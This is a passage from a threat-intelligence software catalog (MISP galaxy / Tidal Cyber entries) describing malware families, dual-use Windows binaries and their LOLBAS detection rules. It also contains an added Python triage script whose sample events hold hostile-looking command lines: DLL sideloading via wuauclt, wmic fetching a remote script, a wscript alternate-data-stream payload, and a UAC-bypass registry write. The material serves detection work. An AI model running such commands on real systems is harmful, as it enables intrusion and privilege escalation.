owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5174 |
source | Tidal Cyber |
tags | ['61f778ca-b2f1-4877-b0f5-fd5e87b6ddab', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WinMM
WinMM is a full-featured, simple backdoor used by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID e10423c2-71a7-4878-96ba-343191136c19
which can be used as unique global reference for WinMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0059 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Linux
Winnti for Linux is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including Winnti Group. The Windows variant is tracked separately under Winnti for Windows.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID e384e711-0796-4cbc-8854-8c3f939faf57
which can be used as unique global reference for Winnti for Linux
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0430 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Winnti for Windows
Winnti for Windows is a modular remote access Trojan (RAT) that has likely been used by multiple groups to carry out intrusions in various regions since at least 2010, including by a group referred to by the same name, Winnti Group.[Kaspersky Winnti April 2013][Microsoft Winnti Jan 2017][Novetta Winnti April 2015][401 TRG Winnti Umbrella May 2018] The Linux variant is tracked separately under Winnti for Linux.[Chronicle Winnti for Linux May 2019]
Internal MISP references
UUID 245c216e-41c3-4dec-8b23-bfc7c6a46d6e
which can be used as unique global reference for Winnti for Windows
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0141 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WinRAR
According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.[WinRAR Website] It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID d9792748-b81a-4d82-a45e-de05c2a23dbf
which can be used as unique global reference for WinRAR
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5081 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'c45ce044-b5b9-426a-866c-130e9f2a4427', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '23d0545e-45fa-4f0a-957e-deb923039c80'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
winrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script used to manage Windows Remote Management (WinRM) settings
Author: Oddvar Moe
Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs
Resources: * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://www.youtube.com/watch?v=3gz1QmiMhss * https://github.com/enigma0x3/windows-operating-system-archaeology * https://redcanary.com/blog/lateral-movement-winrm-wmi/ * https://twitter.com/bohops/status/994405551751815170 * https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 * https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Detection: * Sigma: proc_creation_win_winrm_awl_bypass.yml * Sigma: proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml * Sigma: file_event_win_winrm_awl_bypass.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[winrm.vbs - LOLBAS Project]
Internal MISP references
UUID 8807e10c-dc1b-4dab-8f60-c03a85c18873
which can be used as unique global reference for winrm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5263 |
source | Tidal Cyber |
tags | ['2eecd309-e75d-4f7b-8f6f-e11213f48b12', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WinSCP
WinSCP is a tool used to facilitate file transfer on Microsoft Windows using the SSH File Transfer Protocol (SFTP).[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 3ded75ea-b253-48cd-94e7-aef53e0d1e31
which can be used as unique global reference for WinSCP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5046 |
source | Tidal Cyber |
tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Winword
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files\Microsoft Office\root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office\Office16\winword.exe * C:\Program Files\Microsoft Office\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office\Office15\winword.exe * C:\Program Files\Microsoft Office\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office14\winword.exe * C:\Program Files\Microsoft Office\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_office_arbitrary_cli_download.yml * IOC: Suspicious Office application Internet/network traffic[Winword.exe - LOLBAS Project]
Internal MISP references
UUID 7adaeb79-087f-4d65-8f8f-d4689755b107
which can be used as unique global reference for Winword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5250 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '228354f0-c709-4a16-a489-c5098ae06c17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wiper
Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [Dell Wiper]
Internal MISP references
UUID 627e05c2-c02e-433e-9288-c2d78bce156f
which can be used as unique global reference for Wiper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0041 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
WIREFIRE
WIREFIRE is a web shell written in Python that exists as trojanized logic in the visits.py component of Ivanti Connect Secure VPN appliances. WIREFIRE was used during Cutting Edge for file download and command execution.[Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 93b02819-8acc-5d7d-ad11-abb33f9309cc
which can be used as unique global reference for WIREFIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1115 |
source | MITRE |
type | ['malware'] |
Wireshark
Wireshark is a popular open-source packet analyzer utility.
Internal MISP references
UUID 804da3b9-9c3a-4937-aa4a-efddfa5c176e
which can be used as unique global reference for Wireshark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5269 |
source | Tidal Cyber |
tags | ['dbe18a6a-c8f9-451e-837e-5a7f25dcf913', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
type | ['tool'] |
Wlrmdr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Logon Reminder executable
Author: Moshe Kaplan
Paths: * c:\windows\system32\wlrmdr.exe
Resources: * https://twitter.com/0gtweet/status/1493963591745220608 * https://twitter.com/Oddvarmoe/status/927437787242090496 * https://twitter.com/falsneg/status/1461625526640992260 * https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw
Detection: * Sigma: proc_creation_win_lolbin_wlrmdr.yml * IOC: wlrmdr.exe spawning any new processes[Wlrmdr.exe - LOLBAS Project]
Internal MISP references
UUID f3eb99a8-b7b5-4e90-8e99-3f38309402c0
which can be used as unique global reference for Wlrmdr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5175 |
source | Tidal Cyber |
tags | ['ebf92004-6e43-434c-8380-3671cf3640a2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wmic
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: Oddvar Moe
Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe
Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html * https://twitter.com/subTee/status/986234811944648707
Detection: * Sigma: image_load_wmic_remote_xsl_scripting_dlls.yml * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Sigma: proc_creation_win_wmic_squiblytwo_bypass.yml * Sigma: proc_creation_win_wmic_eventconsumer_creation.yml * Elastic: defense_evasion_suspicious_wmi_script.toml * Elastic: persistence_via_windows_management_instrumentation_event_subscription.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: xsl_script_execution_with_wmic.yml * Splunk: remote_wmi_command_attempt.yml * Splunk: remote_process_instantiation_via_wmi.yml * Splunk: process_execution_via_wmi.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wmic retrieving scripts from remote system/Internet location * IOC: DotNet CLR libraries loaded into wmic.exe * IOC: DotNet CLR Usage Log - wmic.exe.log[LOLBAS Wmic]
Internal MISP references
UUID 24f3b066-a533-4b6c-a590-313a67154ba0
which can be used as unique global reference for Wmic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5176 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '9988b5fd-6235-4a8e-bb8e-d9124ead11d4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Woody RAT
Woody RAT is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.[MalwareBytes WoodyRAT Aug 2022]
Internal MISP references
UUID 1f374a54-c839-5139-b755-555c66a21c12
which can be used as unique global reference for Woody RAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1065 |
source | MITRE |
type | ['malware'] |
WorkFolders
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Work Folders
Author: Elliot Killick
Paths: * C:\Windows\System32\WorkFolders.exe
Resources: * https://www.ctus.io/2021/04/12/exploading/ * https://twitter.com/ElliotKillick/status/1449812843772227588
Detection: * Sigma: proc_creation_win_susp_workfolders.yml * IOC: WorkFolders.exe should not be run on a normal workstation[WorkFolders.exe - LOLBAS Project]
Internal MISP references
UUID 7720f60a-5c03-4241-b635-6313eceb3307
which can be used as unique global reference for WorkFolders
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5177 |
source | Tidal Cyber |
tags | ['b5581207-a45f-4f7f-b637-14444d716ad1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute scripts
Author: Oddvar Moe
Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wscript.exe executing code from alternate data streams * IOC: DotNet CLR libraries loaded into wscript.exe * IOC: DotNet CLR Usage Log - wscript.exe.log[Wscript.exe - LOLBAS Project]
Internal MISP references
UUID be8d1032-3452-4d44-83cb-c7ece7d5a052
which can be used as unique global reference for Wscript
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5178 |
source | Tidal Cyber |
tags | ['b4520b56-73e3-43fd-9f0d-70191132b451', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows subsystem for Linux executable
Author: Matthew Brown
Paths: * C:\Windows\System32\wsl.exe
Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * https://twitter.com/nas_bench/status/1535431474429808642
Detection: * Sigma: proc_creation_win_wsl_lolbin_execution.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Child process from wsl.exe[Wsl.exe - LOLBAS Project]
Internal MISP references
UUID 9663965e-0fd1-45c3-a138-c7539ed91832
which can be used as unique global reference for Wsl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5251 |
source | Tidal Cyber |
tags | ['96ebb518-7c1f-4011-a3ec-42aa78a95e4f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wsreset
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to reset Windows Store settings according to its manifest file
Author: Oddvar Moe
Paths: * C:\Windows\System32\wsreset.exe
Resources: * https://www.activecyber.us/activelabs/windows-uac-bypass * https://twitter.com/ihack4falafel/status/1106644790114947073 * https://github.com/hfiref0x/UACME/blob/master/README.md
Detection: * Sigma: proc_creation_win_uac_bypass_wsreset_integrity_level.yml * Sigma: proc_creation_win_uac_bypass_wsreset.yml * Sigma: registry_event_bypass_via_wsreset.yml * Splunk: wsreset_uac_bypass.yml * IOC: wsreset.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command * IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[Wsreset.exe - LOLBAS Project]
Internal MISP references
UUID b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8
which can be used as unique global reference for Wsreset
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5179 |
source | Tidal Cyber |
tags | ['291fab5d-e732-4b19-83e4-ee642b2ae0f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
wt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Terminal
Author: Nasreddine Bencherchali
Paths: * C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_
Resources: * https://twitter.com/nas_bench/status/1552100271668469761
Detection: * Sigma: proc_creation_win_windows_terminal_susp_children.yml[wt.exe - LOLBAS Project]
Internal MISP references
UUID a34b303e-e8bb-48b2-85e0-f6e2620d68ab
which can be used as unique global reference for wt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5184 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
wuauclt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Update Client
Author: David Middlehurst
Paths: * C:\Windows\System32\wuauclt.exe
Resources: * https://dtm.uk/wuauclt/
Detection: * Sigma: net_connection_win_wuauclt_network_connection.yml * Sigma: proc_creation_win_lolbin_wuauclt.yml * Sigma: proc_creation_win_wuauclt_execution.yml * IOC: wuauclt run with a parameter of a DLL path * IOC: Suspicious wuauclt Internet/network connections[wuauclt.exe - LOLBAS Project]
Internal MISP references
UUID 06fe608d-a517-492f-8557-cfb820984146
which can be used as unique global reference for wuauclt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5180 |
source | Tidal Cyber |
tags | ['03f0e493-63ae-47b5-8353-238390a895a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
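The LOLBAS entries above for winget, Wlrmdr, Wmic, Wscript, Wsl, Wsreset and wuauclt each end in one or two plain-language indicators (a child process that should never exist, a DLL path on the command line, a script fetched from a remote location, a registry value written under a specific key). The following is an added example, not code from LOLBAS, Tidal Cyber or MITRE, that turns those indicators into one triage function over Sysmon-style process-creation (Event ID 1) and registry-value-set (Event ID 13) records. The event dictionaries are constructed samples, not real telemetry; the `-m`/`--manifest` switch for winget, the `/format:` switch for wmic, and the `/UpdateDeploymentProvider ... /RunHandlerComServer` argument form for wuauclt (from the dtm.uk write-up the entry cites) are details the page itself does not spell out.

```python
"""Triage constructed Sysmon-style events against the LOLBAS indicators this
page lists for winget, wlrmdr, wmic, wscript, wsl, wsreset and wuauclt.
Added example; not LOLBAS, Tidal Cyber or MITRE code. Samples are constructed."""
import re
from typing import Dict, List

# Sysmon event IDs: 1 = process creation, 13 = registry value set.
# Registry path is the one the Wsreset entry names as an IOC.
WSRESET_KEY = (r"HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2"
               r"\Shell\open\command")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _has_ads_ref(cmd: str) -> bool:
    """True if a non-switch argument names an NTFS alternate data stream
    (a colon after the optional drive letter, e.g. notes.txt:payload.vbs)."""
    for tok in cmd.lower().split():
        tok = tok.strip('"')
        if tok.startswith("/"):          # //E:vbscript style switches
            continue
        body = tok[2:] if re.match(r"^[a-z]:", tok) else tok
        if ":" in body:
            return True
    return False


def triage(event: Dict[str, object]) -> List[str]:
    """Return the page IOCs an event matches (empty list if none)."""
    hits: List[str] = []
    if event.get("EventID") == 1:
        image = _basename(str(event.get("Image", "")))
        parent = _basename(str(event.get("ParentImage", "")))
        cmd = str(event.get("CommandLine", ""))
        low = cmd.lower()
        # winget: install from a local manifest (-m/--manifest is winget's switch)
        if image == "winget.exe" and re.search(r"(^|\s)(-m|--manifest)(\s|$)", low):
            hits.append("winget local manifest install")
        # wuauclt: a DLL path passed as a parameter
        if image == "wuauclt.exe" and re.search(r"\S+\.dll\b", low):
            hits.append("wuauclt run with DLL path argument")
        # wmic: script pulled from an Internet/UNC location via /format:
        if image == "wmic.exe" and re.search(r'/format:\s*"?(https?://|\\\\)', low):
            hits.append("wmic retrieving script from remote location")
        # wscript: code executed from an alternate data stream
        if image == "wscript.exe" and _has_ads_ref(cmd):
            hits.append("wscript executing from alternate data stream")
        # wlrmdr and wsl: any child process is suspicious
        if parent == "wlrmdr.exe":
            hits.append("wlrmdr.exe spawned a child process")
        if parent == "wsl.exe":
            hits.append("child process of wsl.exe")
        # wsreset: any child other than mmc.exe
        if parent == "wsreset.exe" and image != "mmc.exe":
            hits.append("wsreset.exe child not mmc.exe")
    elif event.get("EventID") == 13:
        target = str(event.get("TargetObject", "")).lower()
        if target.startswith(WSRESET_KEY.lower()):
            hits.append("wsreset UAC bypass registry value written")
    return hits


# Constructed sample events; paths and values are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wsreset.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "wsreset.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wsreset.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\wsreset.exe", "CommandLine": "mmc.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": WSRESET_KEY, "Details": r"C:\Users\Public\payload.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wuauclt.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wuauclt.exe /UpdateDeploymentProvider C:\Users\Public\evil.dll /RunHandlerComServer"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wuauclt.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "wuauclt.exe /detectnow"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"winget install -m C:\Users\user\Downloads\app.yaml"},
    {"EventID": 1, "Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\wlrmdr.exe", "CommandLine": "calc.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wsl.exe", "CommandLine": "cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic os get /format:"https://example.invalid/s.xsl"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\Public\notes.txt:payload.vbs"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe //E:vbscript C:\Users\Public\login.vbs"},
]


def run_samples() -> List[List[str]]:
    """Triage every sample; index i holds the IOC names hit by SAMPLE_EVENTS[i]."""
    return [triage(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for i, hits in enumerate(run_samples()):
        print(i, _basename(str(SAMPLE_EVENTS[i]["Image"])), hits or "-")
```

The benign samples (wsreset started from Explorer, wsreset spawning mmc.exe, wuauclt with /detectnow, wscript with an //E: switch but no stream reference) are there to show that the rules key on parent/child relationships and argument shape rather than on the binary name alone; each of the Sigma rules the entries list encodes the same distinction.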
XAgentOSX
XAgentOSX is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan. [XAgentOSX 2017]
Internal MISP references
UUID 6f411b69-6643-4cc7-9cbd-e15d9219e99c
which can be used as unique global reference for XAgentOSX
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0161 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[Unit42 Xbash Sept 2018]
Internal MISP references
UUID ab442140-0761-4227-bd9e-151da5d0a04f
which can be used as unique global reference for Xbash
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0341 |
source | MITRE |
type | ['malware'] |
xCaon
xCaon is an HTTP variant of the BoxCaon malware family that has been used by IndigoZebra since at least 2014. xCaon has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.[Checkpoint IndigoZebra July 2021][Securelist APT Trends Q2 2017]
Internal MISP references
UUID 11a0dff4-1dc8-4553-8a38-90a07b01bfcd
which can be used as unique global reference for xCaon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0653 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
xCmd
xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems. [xCmd]
Internal MISP references
UUID d943d3d9-3a99-464f-94f0-95aa7963d858
which can be used as unique global reference for xCmd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0123 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
xcopy
xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy command "creates files with the archive attribute set, whether or not this attribute was set in the source file".[xcopy Microsoft]
Internal MISP references
UUID 84954209-1e2a-48dd-ba17-0f015f6de3ef
which can be used as unique global reference for xcopy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5019 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
XCSSET
XCSSET is a macOS modular backdoor that targets Xcode application developers. XCSSET was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[trendmicro xcsset xcode project 2020]
Internal MISP references
UUID 3672ecfa-20bf-4d69-948d-876be343563f
which can be used as unique global reference for XCSSET
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0658 |
source | MITRE |
